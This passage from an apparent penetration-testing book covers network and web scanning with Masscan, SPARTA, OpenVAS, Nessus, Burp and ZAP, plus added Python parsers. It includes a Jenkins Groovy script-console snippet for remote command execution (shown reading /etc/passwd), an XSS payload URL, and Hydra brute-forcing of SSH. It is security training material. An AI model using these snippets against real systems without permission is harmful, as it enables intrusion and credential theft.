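open tcp 80 23.239.151.23 1422855970
open tcp 443 23.239.151.23 1422855971
open tcp 22 23.239.151.23 1422855972
open tcp 8080 23.239.151.40 1422855973
banner tcp 80 23.239.151.23 1422855974 http.server Apache/2.4.7
this line is garbage
open tcp notaport 23.239.151.50 1422855975
open tcp 9200 23.239.151.77 1422855976
# end
"""


def parse_masscan_list(text):
    """Return {ip: set(ports)} for 'open' records; skip comments and malformed lines."""
    hosts = defaultdict(set)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Need at least state, proto, port, ip, timestamp; banner lines are skipped.
        if len(fields) < 5 or fields[0] != "open":
            continue
        _state, proto, port, ip = fields[:4]
        try:
            port = int(port)
            ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed port or IP: ignore the record rather than crash
        if 0 <= port <= 65535 and proto in ("tcp", "udp"):
            hosts[ip].add(port)
    return dict(hosts)


def web_targets(hosts):
    """Build the URL list a screenshot tool would visit, sorted for stable output."""
    urls = []
    for ip in sorted(hosts, key=ipaddress.ip_address):
        for port in sorted(hosts[ip] & WEB_PORTS):
            scheme = "https" if port in TLS_PORTS else "http"
            urls.append(f"{scheme}://{ip}:{port}")
    return urls


def summarize(hosts):
    """Lines like '23.239.151.23: 22,80,443' for a quick read-through."""
    ordered = sorted(hosts.items(), key=lambda kv: ipaddress.ip_address(kv[0]))
    return [f"{ip}: {','.join(str(p) for p in sorted(ports))}" for ip, ports in ordered]


if __name__ == "__main__":
    parsed = parse_masscan_list(SAMPLE_OUTPUT)
    print("\n".join(summarize(parsed)))
    print("\n".join(web_targets(parsed)))
```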


Sparta 
(http://sparta.secforce.com/) (Kali Linux)


Throughout this book, I really try to push the ideas of efficiency and effectiveness. Scanning really 
large networks works great with Masscan, but for smaller or internal networks, we can use a tool like 
SPARTA. 


"SPARTA is a python GUI application which simplifies network infrastructure penetration testing by 
aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by 
having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If 
little time is spent setting up commands and tools, more time can be spent focusing on analysing 
results.” {3} 


The reason I have found SPARTA to be valuable as part of my toolkit is that it runs Nmap in a staged process. SPARTA will start an initial scan of a limited set of ports, start Nikto against any web ports, and take screenshots. After the stage 1 scan finishes, it will start much deeper stage 2 and stage 3 Nmap scans.


Once services are identified, you can easily manually check Nikto, MySQL default credentials, and 
plug directly into the Hydra password brute-force tool all via the GUI interface. 


To start up SPARTA:
• cd /opt/sparta/
• ./sparta.py


SPARTA is really simple and straightforward to use. Once you load up the GUI console, click to add 
hosts and start scanning. SPARTA takes advantage of the nmap detection to start using its auxiliary 
modules. 
SPARTA - Nikto Scan


In the Nikto tab, we can see the results from the Nikto scan. 


Services | Scripts | Information | Notes | nikto (80/tcp) | screenshot (80/tcp)

- Nikto v2.1.6
+ Target IP: 10.239.151.23
+ Target Hostname: 10.239.151.23
+ Target Port: 80
+ Start Time: 2015-02-16 15:49:07 (GMT-5)
+ Server: Apache/2.4.7 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present
+ Root page / redirects to: dashboard/
+ No CGI Directories found (use '-C all' to force check all possible dirs)

SPARTA - Nikto Results
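Every finding in the Nikto output above is visible in the response headers, so here is an added example (my own code, not part of the book, SPARTA or Nikto) that re-implements those header checks, plus the missing-charset check that Burp's passive scanner reports later in this chapter. It runs against a constructed response modelled on the Nikto output and against a hardened version of the same response; the header values are made up for the example.

```python
"""Audit an HTTP response for the header-level weaknesses Nikto reports.

Added example, not part of the book or of Nikto. Checks: Set-Cookie without
HttpOnly, X-Powered-By disclosure, Server version disclosure, missing
X-Frame-Options, and text/html without a charset.
"""
import re

# Constructed response modelled on the Nikto output above (not a real capture).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.7 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.5.9-1ubuntu4.5\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)

# The same response with the issues fixed (constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly; Secure\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "X-Frame-Options: DENY\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)


def parse_response(raw):
    """Split a raw response into (status_line, [(name, value), ...], body)."""
    head, _sep, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = lines[0]
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # not a header line; tolerate junk instead of failing
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def audit_headers(raw):
    """Return a list of finding strings; an empty list means no check fired."""
    _status, headers, _body = parse_response(raw)
    findings = []
    present = {name for name, _ in headers}

    for name, value in headers:
        if name == "set-cookie":
            cookie = value.split(";")[0].split("=")[0]
            attrs = {a.strip().lower() for a in value.split(";")[1:]}
            if "httponly" not in attrs:
                findings.append(f"Cookie {cookie} created without the httponly flag")
        elif name == "x-powered-by":
            findings.append(f"Retrieved x-powered-by header: {value}")
        elif name == "server" and re.search(r"/\d", value):
            # A version number after the product name is an information leak.
            findings.append(f"Server header discloses version: {value}")
        elif (name == "content-type" and value.startswith("text/html")
              and "charset=" not in value.lower()):
            findings.append("HTML response does not specify a charset")

    if "x-frame-options" not in present:
        findings.append("The anti-clickjacking X-Frame-Options header is not present")
    return findings


if __name__ == "__main__":
    for label, resp in (("original", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{label}:")
        for finding in audit_headers(resp) or ["no findings"]:
            print("  + " + finding)
```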


SPARTA will also use cutycapt to take screenshots of the web pages. 


SPARTA - Screenshot


What makes SPARTA so quick is that you can right-click on any host and send it to Hydra. In this 
case, we identify a host with SSH running on HTTPS (443). We can right-click on that host and “Send 
to Brute". 


Services tab: 10.239.151.219, port 443/tcp open, OpenSSH 6.0p1 Debian; right-click menu: Open with netcat, Open with ssh client (as root), Send to Brute, Run nmap (scripts) on port

SPARTA - Brute-force


Clicking on the Brute tab, you can supply either a single username/password combination or username and password lists.


SPARTA - Brute


It also has additional functionality for MySQL to check default credentials. 


Services tab: port 80/tcp open, http, Apache httpd 2.2.29 (Unix) mod_ssl/2.2.29; MySQL (unauthorized); right-click menu: Open with mysql client (as root), Open with netcat, Open with telnet, Send to Brute, Check for default mysql credential, Grab banner, Run nmap (scripts) on port

SPARTA - MySQL Check


While you might use Masscan on large external ranges to do initial discovery, SPARTA is a valuable tool for adding depth to your scans of smaller or internal networks.


Http Screenshot 
(https://github.com/breenmachine/httpscreenshot) (Kali Linux)


One of the most efficient and effective starting points on a penetration test is understanding what systems and services are available. Although there are plenty of network/service level exploits, I have found most initial entry points into an organization, especially from the outside, to be via web applications, because systems have default passwords, simple misconfigurations, or many known web application flaws.


After the reconnaissance phase, you have identified that the Secure Universal Cyber Kittens company 
has a CIDR /20 range on their externally-facing environment. That comes out to 65536 different IPs 
that we need to scan and start analyzing. Sure, we kick off our vulnerability scanner in the 
background, but we need to start attacking, as time is limited. Since there is no way we could visit 
each and every one of those web pages, we need to automate this process and be able to utilize the 
resulting data in an efficient manner. 


This is where we combine both Masscan and HTTP Screenshot to scan the network and take screenshots of the webpages. This way, we can visually look at web pages instead of visiting them one by one. Before starting the scan, we need to configure a few settings:
• cd /opt/httpscreenshot
• edit masshttp.sh to make sure it points to the right masscan executable and make sure that httpscreenshot.py points to the correct location.
  o instead of /root/masscan/bin/masscan, it should be /opt/masscan/bin/masscan
  o instead of ~/tools/httpscreenshot.py, it should be /opt/httpscreenshot/httpscreenshot.py
• change the ports to be scanned from 80,443 to 80,443,8000,8001,8080,8443,8008,9200,50070 [add your favorite web ports here]
• create a file called networks.txt to put in the network CIDR range you want to scan
  o gedit networks.txt


Let's kick off a scan:
• ./masshttp.sh
• firefox ./clusters.html


With the speed of Masscan and the power of HTTP Screenshot, we have a list of websites with the 
host images. There are a lot of benefits of HTTP Screenshot such as resolving certificate hostnames 
for virtual/shared hosting and threading, but the biggest benefit is how it correlates similar web pages 
together. You might have a ton of http basic auth pages or printers and HTTP Screenshot will 
correlate them together. It makes it much easier for attacking and reporting. I will say that the output 
isn't the prettiest, but the functionality is what works. 


So what are we looking for in web application screenshots? The things that should pop out are: 


• Content Management Pages (WordPress, Joomla)
• VoIP Pages
• Networking Devices
• Printers
• Tomcat
• Beta/Dev Sites
• Indexed Pages
• Test sites





Why? Because we want shells! A great place to walk through to get a better understanding of 
vulnerable web applications is to review the exploits themselves. Let’s stop and take a quick look at: 
http://www.exploit-db.com/webapps/. 


From our scan of SUCK, we see normal services like printers (which we will get into a little later), but one thing I now often see on pentests is a couple of Jenkins hosts. This quickly stands out to me and, as stated before, one of the benefits of HTTP Screenshot is that it puts all the Jenkins servers together. Jenkins is a web application that provides continuous integration services for software development. Regardless of what it really does, it has some features that can give us our first point into the network.
HTTP Screenshot


Unauthenticated Jenkins servers are known to have a flaw that allows remote code execution using 
Groovy Script. Pentestgeek.com did a great article on how to take advantage of this vulnerability, by 
visiting the Jenkins’ box over port 8080 and traversing to /script/script: 

e http://[IP]:8080/script/script 


Here, we are presented with a script console, where we can execute arbitrary Groovy Script code {4}:

• def sout = new StringBuffer(), serr = new StringBuffer()
• def proc = '[Code to Execute Here]'.execute()
• proc.consumeProcessOutput(sout, serr)
• proc.waitForOrKill(1000)
• println "out> $sout err> $serr"
This works on both Windows and *nix systems, so just make sure you first find out what system you 
are attacking. In the example below, we will run a quick “cat /etc/passwd" to make sure that we have 
code execution. 


Jenkins Script Console at 192.168.123.123, Result pane showing the first lines of /etc/passwd

Jenkins Vulnerable Server


As you can see in the results, we were able to execute our payload and read its output. We won't dive much deeper in this section, but this provides a good example of how HTTP Screenshot can be beneficial.


One additional thing I want to point out when doing web screenshots is that you will sometimes run into issues where one of the tools does not work, or run into scenarios where you need more information. I always tell my readers never to focus on one tool, and in this case there are two other tools to look at:


Eyewitness - https://www.christophertruncer.com/eyewitness-triage-tool/ ended up really replacing Peepingtom, which was talked about in the first book. Eyewitness works great, but I have had problems on large scans. These might be fixed by now, but this was just one of the many issues I kept running into.


One other tool that I would look into is an interesting project called WMAP Network Scanning. The gap they are trying to solve is that these web scrapers don't generally handle or render Flash or Java. On those special pentests where you have a ton of these types of sites, you could look into this Chrome Extension:
• http://thehackerblog.com/wmap-a-chrome-extension-for-taking-screenshots-of-web-services/
• https://chrome.google.com/webstore/detail/wmap/pflahkdjlekaeehbenhpkpipgkbbdbl


How WMAP works is that it uses Chrome to open a new tab with the IP and takes a picture of the 
page. It takes advantage of the fact that the browser will do all the rendering. 


Configuring WMAP is extremely simple after the installation of the Chrome plugin.
WMAP Results


I do have some problems with this tool, mainly with speed and how it opens a tab for each site, but it does render things that Peepingtom and Eyewitness cannot since it uses the browser.


Vulnerability Scanning: 


After performing initial scans and mapping out the network, I usually like to kick off a couple of 
vulnerability scans in the background. I will go over a few tools to help you with vulnerability 
scanning. 


Rapid7 Nexpose/Tenable Nessus 
(Kali/Windows/OS X): 


Two of the most common vulnerability-scanning tools I see are Rapid7 Nexpose and Tenable Nessus. 
Like I said in the last book, there is always a huge war about which one of the scanners is better, and 
again I offer this caveat: I have used most of the commercial scanners and have never found one to be 
perfect or the right solution. When comparing these tools, I have seen that there are always some 
findings that are discovered and missed by certain tools. The best idea would be to run multiple tools, 
but this isn't always the most financially acceptable solution. My quick two cents is that if you are 
going to purchase a single license, I would recommend getting Tenable's Nessus Vulnerability 
Scanner. For the number of IPs you can scan and the cost ($1,500), it is the most reasonable. I have 
found that a single consultant license of NeXpose is double the price and limited on the number of IPs 
you can scan, but I ask that you verify, as you never know when prices might change. In terms of 
performance and ease of use, for large complex networks, I prefer the management interface on 
NeXpose. In terms of finding odd vulnerabilities, Nessus takes the cake on this one. They definitely 
do a lot of research on embedded devices and SCADA (and the like), where I don't see those types of 
findings on my Rapid7 reports. 


The best option here is to give both of them a trial:
• Rapid7 NeXpose: http://www.rapid7.com/products/nexpose/compare-downloads.jsp
• Tenable Nessus: www.tenable.com/products/nessus/evaluate


Openvas 
(http://www.openvas.org/) (Kali)


Since I discuss commercial tools a lot, as I mentioned in previous chapters, I want to be able to complement them with open source tools. There is a decent open source vulnerability tool that you can also use in your arsenal. Open Vulnerability Assessment System (OpenVAS) is a great tool for learning and testing vulnerabilities. Compared to the commercial tools, from my experience, OpenVAS does pick up a lot of similar findings, but I have noticed on engagements that it misses potentially high findings. I have also had a lot of trouble with OpenVAS when things break. When it breaks, it breaks hard, and a lot of manual work is needed to get it back up and running.


The positive side of OpenVAS is that it does do all the things required by a scanner. It can run 
different configurations, do authenticated scans, create reports, and even distribute scans over 
multiple nodes. 


To get OpenVAS up and running, from a command prompt on your Kali host, type:
• openvas-setup
• openvas-scapdata-sync
• openvas-certdata-sync
• openvas-adduser
• gsd


Enter the server address as localhost and the username/password of the account you created during 
the setup phase. 


OpenVAS (Greenbone Security Desktop login dialog)


Once you log in, you can go right to starting a scan:
• Tasks -> New
• Click on the Blue Star on Scan Targets
• Add your IP ranges and Create the Scan


Greenbone Security Desktop, New Task dialog: Name, Comment (optional), Scan Config, Scan Targets, Escalator (optional), Schedule (optional), Slave (optional); Cancel / Create

OpenVAS Settings


It is pretty straightforward to start and kick off a vulnerability scan as your tasks should be pre- 
populated at the bottom pane of Greenbone Security Desktop. Once you see your task, you can right- 
click on that task and click “Start.” 


Greenbone Security Desktop (File, Task, View, Settings, Extras, Help), logged in as root at 127.0.0.1

OpenVAS - Starting Scan








Once the scan completes, you can go over to the report tab or export the report to a PDF format. 











OpenVAS - Results


This vsftpd vulnerability was the one that we found on the Metasploitable 2 box, which we used to 
exploit with Metasploit in the prior section. 


OpenVAS - Findings (exported PDF report)


Vulnerability scanning is still an important factor in any penetration test, though it definitely is not the be-all and end-all for offensive testing. If you look at real world examples, other than external scanning, most attacks do not incorporate a lot of internal scans. This is because scans are loud, trigger intrusion detection systems, and, at times, take down services. Instead, attackers focus on moving quietly through the network, using the knowledge gained at each step to move laterally, and on exfiltrating data.


Web Application Scanning 


Scanning the SUCK network, we should now have a good idea of what the infrastructure and running services look like. We have done our research with OSINT tools, created password lists, and run our vulnerability scanner. So what's next? Most companies these days actually do run vulnerability scanners across their networks; I still come across MS08-067, but it is becoming much less frequent. If you do come across an infrastructure that generally patches well, then web application scanning on a network pentest can be extremely helpful.


After I start the network scanners and get a layout with the active discovery tools, I begin my web 
application scanners. In web scanning, I am going to mainly focus on one tool. There are a lot of good 
open source/free tools available to use, such as ZAP, WebScarab, Nikto, w3af, etc. In this case, I am 
going for the quickest, most efficient way to perform a test. Although the Burp Suite Pro 
(http://portswigger.net/burp/) is a commercial tool, it only costs around $300. This is well worth the 
cost as it is actively maintained, has a lot of capabilities for manual testing, and many security 
researchers develop extensions for Burp. 


Similar to the discussion of vulnerability scanners, this isn't going to be a comprehensive guide to accomplishing web application penetration tests, but more of what is performed during a network penetration test. If you want to focus on testing a single application thoroughly, you are going to want to look into both source code analysis (using something like HP Fortify) and in-depth application testing (a great resource for this is a book called The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws). Let's dive into how to efficiently use Burp Suite.


The Process For Web Scanning 


In this section, I describe how I use Burp Suite Pro to scan web applications during a network 
penetration test. Usually, I won't have enough time during a network pen-test to do a full web 
application test, but these are the steps I take when I identify larger applications: 

• Spider/Discovery/Scanning with Burp Pro
• Scanning with a web application scanner
• Manual parameter injection
• Session token analysis


Web Application Scanning 


After running a tool like Nessus or Nexpose to find the common system/application/service vulnerabilities, it is time to dig into the application. I am going to describe how to use Burp Suite and get you started looking deeper into the application. The following steps will:

1) Configure Your Network Proxy
2) Enable Burp Suite
3) Spider through the application
4) Discover Content
5) Run the Active Scanner
6) Exploit


Configuring Your Network Proxy and Browser
Remember that the Burp Suite tool works by configuring your web browser to talk through the Burp Suite application and then to the web application(s). This will give you full visibility into the requests made by the browser and also give you the ability to modify the raw requests regardless of client side protections.


First, you are going to want to start Burp Suite by running the JAR file on either the Windows or Kali 
system. Once you have Burp up and running, you want to make sure your proxy is enabled and 
listening on port 8080. Go to the Proxy tab in Burp, then to Options, and make sure that Burp is 
running. It doesn't matter which interface port you use, however, if you change it from the default, 
make sure to change it in your browser's configuration. 


Burp Proxy Options tab: Proxy Listeners (Running), CA certificate settings, Intercept Client Requests rules

Enabling Burp Suite


Now, we need to configure your browser so that it can use the port on which we have Burp Proxy listening. The add-on that I use is called FoxyProxy for Firefox: (https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/)


It should have been installed in the setup phase. It provides an easy way to have multiple proxies and be able to change between them quickly. Right next to the browser's URL bar, there is a fox with a circle and line across it. Click on the fox, click Add New Proxy, click the Proxy Details tab, and set the Manual Proxy Configuration to the local host (127.0.0.1) and the proxy port of 8080. Go back to the General tab, give that proxy a name, and save that configuration.


What you have essentially done is told your browser to send all the traffic to your local host to port 
8080. This is the port on which we have configured the Burp Suite application to listen. Burp knows 
that it will take this traffic and proxy it out to the Internet. 


FoxyProxy Proxy Details tab: Manual Proxy Configuration, Host or IP Address 127.0.0.1

Configuring the Browser's Proxy Settings


Since you have saved this profile, right-click on the fox and drop down to select your proxy 
configuration. In this case, I named my proxy configuration Burp Suite and selected that as my proxy. 


FoxyProxy menu: Use proxy "Default" for all URLs, Completely disable FoxyProxy, Options, QuickAdd, Use Advanced Menus

Selecting the Proxy to Utilize


Once we have our browser using the proxy, we can browse to the web application we identified 
earlier. In this example, I am going to go to my site in my browser: www.securepla.net. If we go back 
to Burp, we are going to see the Proxy/Intercept tab light up. 


Burp Capture and Intercepting Traffic


If we see this happen, we know we have configured everything perfectly. We see that Burp 
successfully captured the GET request for my website and we can also see any cookies and other 
requested information. By default, the initial state is to intercept all traffic. Intercept means to stop 
any requests from the browser to the web application, give you the ability to read or modify that 
request, and either forward that request to the web application or drop that request. 


If you try to browse to any sites with the default setting, you won't be able to see any responses until 
you turn off the "Intercept" button. By turning the "Intercept" button off, we will still be capturing all 
the web traffic, but we won't be directly tampering with every request. Once in an “Intercept-off’ 
state, you can see all the requests and responses within the History tab to the right of the Intercept. 


Now, if we go to the Target tab, we can see the URL that we had just trapped and forwarded. Let's 
first add this site to our Scope. Scope defines where automated spidering and testing could occur and 
helps prevent you from actively scanning domains that are out of your scope. We will go into this a 
little bit later, but you should add all the URLs or FQDNs you want to test to your scope. The image 
below shows the tester right-clicking on the domain and clicking on "Add to scope." 


Creating Your Scope


Spider Application
The first thing to do for web application testing is to spider the host. This means that Burp will crawl through the whole website and record all the different files, forms, and HTTP methods on that site. We spider first because we need to identify where all the links are, what types of parameters are used in the application, what external sites the application references, and the overall layout of how the application functions.


To spider your application, drop into the Target tab, the Site map tab, right-click the domain on which 
you want to spider, and click "Spider this host." 
Spidering the Host


Once the spidering process is complete, Burp should have a good layout of what the application looks like. We can also click on any file (image below) to see what the request and the response were. In the left-hand column, we see all of the files and folders, and on the right-hand side, we see the requests and responses. Right below the Site map tab is the Filter button. Try playing around with this to see what you are filtering out and what works for you. Generally, I like to first add all my domains to scope and then click the Filter to only show those that are in scope. It ends up cleaning up a lot of referenced domains, which are out of scope on my tests anyway.

Site Map/Request and Responses





Discover Content 

There are times where pages or folders are not directly linked from a web application. For example, I 
have often seen that the admin folder or login page are not referenced anywhere on the site. You might 
see that when you go to the /admin/ folder in your browser bar, you are taken to the admin 
authentication page, but this might have been missed during the spidering phase. This is usually 
because host administrators are trying to hide these folders and administrative login pages from 
general users. These are the exact types of things you are looking for in a test, so that you can try to 
bypass or brute-force the authentication process. 


There is a specific module within Burp that is extremely helpful in these scenarios. Within the same 
Site map tab, you right-click on the parent URL, drop down to "Engagement tools," and click on 
"Discover content." 
Discover Content


Once inside the Discovery module, you can click on the "Session is not running" button and the 
application will start "smart brute forcing" folders and file structures. When I say, "smart brute 
forcing," I mean the application learns from files and folders it finds within the application and tries 
to make better choices for brute forcing. This technique provides an efficient process to identify 
folders and files to further your application testing. 


Before I show the example, note that there are custom wordlists that I prefer to use during my own 
assessments. One of these lists comes from a tool called RAFT that is no longer developed. 


These lists can be found here: http://code.google.com/p/raft/source/browse/trunk/data/wordlists/?r=64





Content discovery session, Control tab: Session is running; Requests made: 38; Bytes transferred: 249,402; Errors: 0; Tasks queued: 170; Spider requests queued: 0; Responses queued for analysis: 0. Queued tasks for /wp-includes/js/, /wp-includes/js/jquery/, /feed/, /search/ and /cookie/ (test observed file names, test observed directory names)

Discovering Session Status


As you can see in the image above, the Discovery tool identified the /wp-includes/ folder which is 
common to WordPress applications. It then starts looking for common folder/files types within that 
folder. You can click on the Site map tab at the top of the Discovery module and see all the results 
from that scan. This will help to quickly identify hidden folders, admin pages, configuration pages, 
and other pages that will prove useful to a tester. 


Running the Active Scanner
Once you feel comfortable that you have identified an adequate portion of the site, you can start attacking the parameters and requests and start looking for vulnerabilities. This can be done by right-clicking on the parent domain and dropping down to "Actively scan this host" (image below). This will kick off Burp's application scanner and start fuzzing input parameters. Remember, this is going to be extremely loud on the network and may submit extensive queries in the application. A quick warning: if the application has a comment box, the customer might receive an excessive amount of emails from all the parameters being actively fuzzed. This is why it is always important to let your customer know when and from where the tester will be performing these tasks.


(Screenshot: the Burp Site map, filtered to hide out-of-scope and not-found items, with the right-click menu open on http://www.securepla.net/: Remove from scope, Spider this host, Actively scan this host, Passively scan this host, Engagement tools, Compare site maps, Expand branch, Expand requested items.)


Active Vulnerability Scans


Once the scanner is running, the results and testing queue will be located in the "Scanner" tab. You 
might want to look at the Options tab within the Scanner tab to further configure Burp Suite. One 
change that I generally make to decrease scan times is to increase the number of threads in the Active 
Scan Engine section. This will make a significant difference in the amount of time that is required, but 
be careful, as you might take down a small site if the thread count is too high. 


If we take a look at the results, we see that Burp Suite found an XSS vulnerability for this website.
Burp told us exactly what the issue was, the request to repeat it, and the response.


(Screenshot: Burp Scanner results for www.securepla.net. The issue list includes Cross-site scripting (reflected), Cross-domain Referer leakage, Cross-domain script include [4], Email addresses disclosed [2], Private IP addresses disclosed, Robots.txt file, HTML does not specify charset [5], Frameable response (potential Clickjacking) [4] and Content type incorrectly stated [2]; the triggering request, with its User-Agent and Accept headers, is shown beneath the list.)


Scan Results





Being a penetration tester, you need to verify that you do not have any false positives and identify the 
actual severity of the finding. Let's see if what Burp had found was actually valid. Clicking on one of 
the XSS vulnerabilities, we can see the exact GET parameter that was used. To replicate this issue, 
we would have to go and visit: 


www.securepla.net/xss_example/example.php?alert=9228a<script>alert(1)</script>281717daa8d


Opening a browser and entering the URL, the following demonstrates that this is not a false positive, 
but a real vulnerability. If you aren't familiar with XSS attacks, I would spend some time playing with 
a vulnerable web application framework like WebGoat: 


https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project





(Screenshot: a browser at www.securepla.net/xss_example/example.php?alert=9228a<script>... showing the injected alert dialog.)


XSS Example


Burp will do a lot more than just check for XSS vulnerabilities. It can identify CSRF issues, bad SSL 
certs, directory traversal vulnerabilities, SQL injections, command injections, and much more. To see 
more uses of Burp, go to the section in this book about The Throw - Web Application Pentesting. 


OWASP Zap Proxy
(https://code.google.com/p/zaproxy/) (Kali Linux/Windows/OS X)


The equivalent to Burp Pro Proxy on the open source side is called OWASP Zed Attack Proxy, or
ZAP. Although Burp is a commercial tool, ZAP has many of the same features. From proxying traffic and
fuzzing requests to spidering and automated scanning, ZAP does it all. On Windows/OS X, you can just
double-click the OWASP ZAP executable; on Kali, run owasp-zap.


We are going to test against one of the vulnerable frameworks on OWASPBWA (which we installed 
in the setup phase of the book). In this case we will be testing against the owaspbricks application. 
Once you start up ZAP, you will be presented with the image below. The straightforward attack is to 
just put in the URL http://[IP of VM]/owaspbricks/ and hit Attack. ZAP will automatically run through 
the spidering and testing for web vulnerabilities. 


(Screenshot: the OWASP ZAP start screen, "Welcome to the OWASP Zed Attack Proxy (ZAP)", with ZAP's reminder that you should only attack applications you have been given permission to test, the URL to attack set to http://172.16.151.144/owaspbricks/, and the progress line "Spidering the URL to discover the content". The Spider tab below shows the discovered pages under http://172.16.151.144/owaspbricks/.)


OWASP ZAP





As you can see, everything is pretty straightforward. Once the scan is finished, click on the Alerts tab 
to see all the vulnerabilities that are identified. 


(Screenshot: the OWASP ZAP Alerts tab for http://172.16.151.144/owaspbricks/. The alerts include Cross Site Scripting (Reflected), SQL Injection, Application Error disclosure, Directory browsing (3), Password Autocomplete in browser (5), X-Content-Type-Options header missing (54) and X-Frame-Options header not set (51). The selected XSS alert shows Risk: High, Parameter: user, Attack: <div><script>alert(1);</script><div>, with the matching evidence in the response; the response pane above shows an Apache/PHP server header and the page body.)


OWASP ZAP - Results


Scanning with multiple web application scanners is just as important as scanning with both Nessus
and Nexpose for network-based vulnerabilities. Here is a side-by-side comparison of scanning the
same application. As we can see, we have found completely different vulnerabilities, vulnerability
locations, and types of findings between ZAP on the left and Burp on the right. It is instantly clear
that the two scanners produce very different results.





(Screenshot: side-by-side results for the same host, 172.16.151.144, with OWASP ZAP on the left and Burp on the right; both list a Cross-site scripting (reflected) finding, Burp's with Confidence: Certain, but the remaining findings differ.)


OWASP ZAP VS Burp


The one question that I often get is: "Which is better?" The answer is that it always depends. The best
answer would be to use both. They both do a lot of the same things, but each has benefits in its specific
areas. The security community does lean more on Burp Proxy Pro because it supports Burp
Extender (http://portswigger.net/burp/extender/), which you can use to create customized scan tools.
You might have an application that does some processing of cookies or that requires a multi-step
process before fuzzing a certain parameter. This is where Burp excels, and you can read more about
this here:


http://blog.opensecurityresearch.com/2014/03/extending-burp.html


Parsing Nessus, Nmap, Burp 


One of the biggest problems for any tester is that the output formats of the many different tools make
their results hard to work with together. Lee Baird has included a great parsing tool in his Discover
toolset. It standardizes all the ports, services, findings, and associated information into an easily
usable CSV format.


• cd /opt/discover
• ./discover.sh
   ○ 12. Parse XML
   ○ 2. Nessus (.nessus format)


(Screenshot: a terminal showing the Discover "Parse XML" menu with the entries Nessus, Nmap and Previous menu, and "Choice: 2" entered.)


Discover Parsing


The output is saved to a CSV file under /home/data. The image below shows both Nessus and Nmap
output. This makes it much easier to quickly identify systems, services, and vulnerabilities.


(Screenshot: the parsed output opened in a spreadsheet. The Nessus sheet has the columns CVSS Score, IP, FQDN, OS, Port and Vulnerability, listing findings for 192.168.1.11 (METASPLOIT, Linux Kernel 2.6 on Ubuntu 8.04) such as Apache Tomcat Manager Common Administrative Credentials on 8180 and Apache PHP-CGI Remote Code Execution on 80. The nmap.csv sheet has the columns IP Address, FQDN, OS, Port and Protocol, for example 192.168.1.65, uverse_NODE_WIFI, Motorola VIP1232 digital set top box, 8080, tcp.)


Discover Results
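Discover does this conversion for you; as an added example (not Discover's own code, nor the book's), here is the Nmap half written in Python: it walks Nmap's -oX XML and emits one CSV row per open port on each live host, with the columns the screenshot shows plus a Service column. The XML document is constructed here from hosts like those in the screenshot.

```python
import csv
import io
import xml.etree.ElementTree as ET

# Constructed Nmap XML (the layout nmap -oX produces), modelled on the screenshot above.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.65" addrtype="ipv4"/>
    <hostnames><hostname name="uverse_NODE_WIFI" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="8080"><state state="open"/><service name="http-proxy"/></port>
      <port protocol="tcp" portid="8086"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="22"><state state="closed"/><service name="ssh"/></port>
    </ports>
    <os><osmatch name="Motorola VIP1232 digital set top box" accuracy="90"/></os>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.70" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="443"><state state="open"/>
        <service name="https" product="Apache httpd" version="2.2.14"/></port>
    </ports>
    <os><osmatch name="Linux 2.4.18 - 2.4.35 (likely embedded)" accuracy="85"/></os>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.99" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

FIELDS = ["IP Address", "FQDN", "OS", "Port", "Protocol", "Service"]


def parse_nmap_xml(xml_text):
    """Return one row per open port on each live host."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue                                    # host did not answer: nothing to list
        ip = next((a.get("addr") for a in host.findall("address")
                   if a.get("addrtype") in ("ipv4", "ipv6")), "")
        hostname = host.find("hostnames/hostname")      # None when Nmap resolved no name
        osmatch = host.find("os/osmatch")               # first (best) OS guess, if any
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                                # closed/filtered ports are noise here
            svc = port.find("service")
            service = "" if svc is None else " ".join(
                v for v in (svc.get("name"), svc.get("product"), svc.get("version")) if v)
            rows.append({
                "IP Address": ip,
                "FQDN": hostname.get("name") if hostname is not None else "",
                "OS": osmatch.get("name") if osmatch is not None else "",
                "Port": int(port.get("portid")),
                "Protocol": port.get("protocol"),
                "Service": service,
            })
    return rows


def to_csv(rows):
    """Serialise the rows as CSV text (write it to a file to open in a spreadsheet)."""
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=FIELDS)
    writer.writeheader()
    writer.writerows(rows)
    return out.getvalue()


if __name__ == "__main__":
    print(to_csv(parse_nmap_xml(SAMPLE_NMAP_XML)))
```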


Burp takes a couple more steps. On the Scanner/Results tab, right-click the URL you scanned and
